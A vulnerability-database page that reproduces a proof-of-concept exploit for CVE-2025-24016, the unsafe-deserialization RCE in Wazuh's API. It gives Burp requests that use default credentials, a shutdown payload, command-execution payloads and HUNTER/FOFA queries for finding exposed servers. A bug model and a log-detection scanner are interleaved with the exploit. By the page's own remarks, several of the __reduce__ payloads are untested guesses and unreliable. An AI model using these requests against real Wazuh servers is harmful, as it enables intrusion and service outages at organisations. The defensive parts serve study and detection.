Related vulnerability
Title:
Wazuh code issue vulnerability
(CVE-2025-24016)
Description: Wazuh is an open-source application from Wazuh used to collect, aggregate, index and analyze security data, helping organizations detect intrusions, threats and behavioral anomalies. Wazuh versions from 4.4.0 up to, but not including, 4.9.1 contain a code issue vulnerability caused by unsafe deserialization in the distributed API, which allows an attacker to achieve remote code execution.
Description
A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. The bug affects Wazuh versions 4.4.0 through 4.9.0 (≥ 4.4.0, < 4.9.1) and is patched in version 4.9.1.
Introduction
🚨 Wazuh Remote Code Execution (RCE) - PoC
### 📌 Vulnerability Summary
>A critical RCE vulnerability has been identified in the Wazuh server due to unsafe deserialization in the wazuh-manager package. The bug affects Wazuh versions 4.4.0 through 4.9.0 (≥ 4.4.0, < 4.9.1) and is patched in version 4.9.1.
🔍 **Details**
>The flaw lies in the Wazuh API's DistributedAPI (DAPI), which deserializes the JSON it receives with an object hook that rebuilds Python objects from special keys. Because user-controlled input reaches that hook, an attacker with valid API credentials (e.g. from a compromised dashboard or cluster node) can send a crafted JSON body to the run_as endpoint and have arbitrary Python code executed on the master server.
📬 **Proof of Concept (Burp Request)**
```
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}
```
📌 The Authorization header is the base64 of `wazuh-wui:MyS3cr37P450r.*-`, the default credentials of the `wazuh-wui` API user. If the target rotated that password, encode `user:password` for an API user that has `allow_run_as` enabled (`wazuh-wui` has it by default); the run_as endpoint rejects users without it.
📌 The JSON body is the `auth_context` of the run_as request. The vulnerable deserializer evaluates the `__class__` string and calls the result with `__args__`; here that is Python's `exit()`, so the API process terminates and the server becomes unavailable (DoS). The same mechanism is what turns the bug into code execution when `__class__` holds another expression instead of `exit`.
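The following is an added example, not code from this page's PoC or from the Wazuh project: a minimal Python model of the bug class, a JSON `object_hook` that rebuilds `__unhandled_exc__` entries by evaluating the `__class__` string, shown beside a hardened hook that only accepts builtin exception classes looked up by name with scalar arguments. The key names follow the PoC above; the hook bodies, the `deserialize`/`is_rejected` helpers and the sample payloads are assumptions for illustration, not Wazuh's implementation.

```python
"""Model of the unsafe-deserialization bug class behind CVE-2025-24016.

Illustrative reconstruction written for this page, NOT Wazuh's code. It keeps
the key names from the PoC (__unhandled_exc__, __class__, __args__) to show why
evaluating a class name taken from the wire is code execution, and what a safe
replacement looks like.
"""
import builtins
import json


def vulnerable_hook(dct):
    """Object hook that trusts the wire: the class name is eval()'d, so any
    Python expression ("exit", "__import__('os').system", ...) runs here."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        return eval(exc["__class__"])(*exc["__args__"])  # deliberately unsafe
    return dct


def hardened_hook(dct):
    """Only rebuild real builtin exception classes, looked up by name (never
    evaluated), and only with scalar arguments. Anything else is rejected."""
    if "__unhandled_exc__" in dct:
        exc = dct["__unhandled_exc__"]
        if not isinstance(exc, dict):
            raise ValueError("malformed __unhandled_exc__")
        name = exc.get("__class__", "")
        cls = getattr(builtins, name, None) if isinstance(name, str) else None
        if not (isinstance(cls, type) and issubclass(cls, BaseException)):
            raise ValueError(f"refusing to deserialize class {name!r}")
        args = exc.get("__args__", [])
        if not all(isinstance(a, (str, int, float, bool, type(None))) for a in args):
            raise ValueError("exception args must be scalars")
        return cls(*args)
    return dct


def deserialize(raw, hook):
    """Decode JSON with the given hook; inner dicts are hooked before outer ones."""
    return json.loads(raw, object_hook=hook)


def is_rejected(raw, hook):
    """True when the hook refuses the payload instead of building an object."""
    try:
        deserialize(raw, hook)
    except ValueError:
        return True
    return False


# Constructed payloads in the shape used by the PoC on this page.
BENIGN = json.dumps({"__unhandled_exc__": {"__class__": "KeyError", "__args__": ["agent_id"]}})
# Harmless stand-in for an RCE expression: it runs os.getpid() in the decoder.
RCE = json.dumps({"__unhandled_exc__": {"__class__": "__import__('os').getpid", "__args__": []}})
# A pickle-style __reduce__ key means nothing to a JSON decoder; it stays plain data.
REDUCE_STYLE = json.dumps({"__reduce__": ["__import__('os').system", ["whoami"]]})

if __name__ == "__main__":
    print("benign via vulnerable hook:", repr(deserialize(BENIGN, vulnerable_hook)))
    print("RCE expression via vulnerable hook (our pid):", deserialize(RCE, vulnerable_hook))
    print("RCE expression via hardened hook rejected:", is_rejected(RCE, hardened_hook))
    print("__reduce__ key passes through as data:", deserialize(REDUCE_STYLE, vulnerable_hook))
```

Run the file directly to see the four outcomes. Two points carry over to the real bug: the only thing that matters is which key the server-side hook acts on, and in this model (as in any standard JSON decoder) a `__reduce__` key is inert data, so the `__reduce__`-style payloads further down this page would not be evaluated by a hook of this shape.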
💥 **Impact**
- Full Remote Code Execution via the API
- Server Shutdown in PoC (DoS)
- Risk of lateral movement across Wazuh clusters
🛡️ Mitigation
- ✅ Upgrade to Wazuh v4.9.1 or higher
- 🚫 Avoid exposing the API externally
- 🧪 Monitor unusual API activity
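For the "monitor unusual API activity" item, here is an added detection example, not part of this page or of the Wazuh project: a scanner that parses constructed API access-log lines in an assumed layout (timestamp, user, source IP, method, path, JSON body, status; the real wazuh-api log format differs, so adapt `LINE_RE` to it) and labels any request body carrying the `__unhandled_exc__` shape from the PoC, distinguishing the `exit` shutdown form from expression-style class names.

```python
"""Flag CVE-2025-24016-style request bodies in API access logs.

Added example for this page. SAMPLE_LOG and LINE_RE are constructed and assume
a simplified 'user ip "METHOD path" body {...} status N' layout; the real
wazuh-api log layout is different and LINE_RE must be adapted to it.
"""
import json
import re

# Constructed sample lines: one legitimate run_as call, the page's DoS PoC,
# an expression-style class name, and an unrelated request.
SAMPLE_LOG = """\
2025/02/10 09:00:01 INFO: wazuh-wui 10.0.0.5 "POST /security/user/authenticate/run_as" body {"user_id": "alice", "roles": ["admin"]} status 200
2025/02/10 09:00:07 INFO: wazuh-wui 198.51.100.23 "POST /security/user/authenticate/run_as" body {"__unhandled_exc__": {"__class__": "exit", "__args__": []}} status 500
2025/02/10 09:00:09 INFO: wazuh-wui 198.51.100.23 "POST /security/user/authenticate/run_as" body {"__unhandled_exc__": {"__class__": "__import__('os').system", "__args__": ["id"]}} status 500
2025/02/10 09:01:00 INFO: wazuh 10.0.0.8 "GET /agents" body {} status 200
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) \w+: (?P<user>\S+) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" '
    r'body (?P<body>\{.*\}) status (?P<status>\d+)$'
)


def walk(obj):
    """Yield every dict nested anywhere in a decoded JSON value."""
    if isinstance(obj, dict):
        yield obj
        for value in obj.values():
            yield from walk(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from walk(value)


def classify_body(body):
    """Return None for a clean body, otherwise a short label for the attack shape.

    A client has no business sending __unhandled_exc__ at all; the label only
    says which variant was attempted.
    """
    for dct in walk(body):
        if "__unhandled_exc__" in dct:
            exc = dct["__unhandled_exc__"]
            cls = exc.get("__class__", "") if isinstance(exc, dict) else ""
            if not isinstance(cls, str) or not cls.isidentifier():
                return "rce-expression"        # e.g. __import__('os').system
            if cls in ("exit", "quit"):
                return "dos-interpreter-exit"  # the shutdown PoC on this page
            return "forged-exception"
    return None


def scan(log_text):
    """Parse each line, decode its body and collect one finding per hit."""
    findings = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        try:
            body = json.loads(match["body"])
        except json.JSONDecodeError:
            continue
        label = classify_body(body)
        if label:
            findings.append({
                "ts": match["ts"], "user": match["user"], "ip": match["ip"],
                "path": match["path"], "status": int(match["status"]), "label": label,
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Run it against the master's API log; every hit is worth an alert, and a source IP that is not a dashboard or cluster node host is the first thing to check.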
### ✅ Example Payload to Run whoami
```
{
"__unhandled_exc__": {
"__class__": "os",
"__import__": "os",
"system": "whoami"
}
}
```
This alone does nothing: a JSON decoder treats `__import__` and `system` as ordinary keys, and the resulting object tree is never executed. The form this page actually demonstrates is the `__unhandled_exc__` dictionary above, whose `__class__` value is evaluated. `__reduce__` is a pickle-protocol hook, not a JSON one, so the `__reduce__` payloads that follow are untested guesses rather than the demonstrated technique.
Here is the format for a **Burp request** using Python's `os.system()` via pickle-like logic:
💣 **Burp RCE Payload (`__reduce__` form, untested)**
```
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dWgtd3VpOk15UzNjcjM3UDQ1MHIuKi0=
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}
```
🧬 **To run ls, change payload:**
```
{
"__reduce__": [
"__import__('os').system",
["ls -la"]
]
}
```
You can also use:
```
{
"__reduce__": [
"__import__('subprocess').getoutput",
["id"]
]
}
```
⚠️ Note: the `__reduce__` payloads above only work if the backend actually evaluates that structure, which this page does not demonstrate; the `__unhandled_exc__` form is the one the Wazuh deserializer is known to act on. What reaches the deserializer is the `auth_context` body of the run_as request, so that body is the input you control.
🔐 Pro Tip
Intercept the request in Burp, go to the Repeater tab, and test multiple payloads like:
- `"whoami"`
- `"id"`
- `"uname -a"`
- `"ls /home/wazuh"`
👇Query
- HUNTER : `product.name="Wazuh"`
- FOFA : `app="Wazuh"`
If the response is **empty** or the status is **500**, check the server-side logs. `os.system()` returns only the exit status, and the command's output goes to the API process's stdout, not to the HTTP response; an exception raised during deserialization usually produces a 500 whether or not the command ran. Confirm execution out of band, for example by having the command write a marker file on the master and checking for it.
📚 Stay **sharp**, **hackers**! More **bug bounty PoCs**, **bypasses**, and **payloads** are coming!
Follow 👉 [@cybersecplayground](https://t.me/cybersecplayground) for daily hacking content!
> #bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit
File snapshot
[4.0K] /data/pocs/7a0130c576062f15fcfa81629f7392e49266ed4a
├── [1021] CVE-2025-24016-POC.py
├── [1.1K] LICENSE
└── [3.0K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, email f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.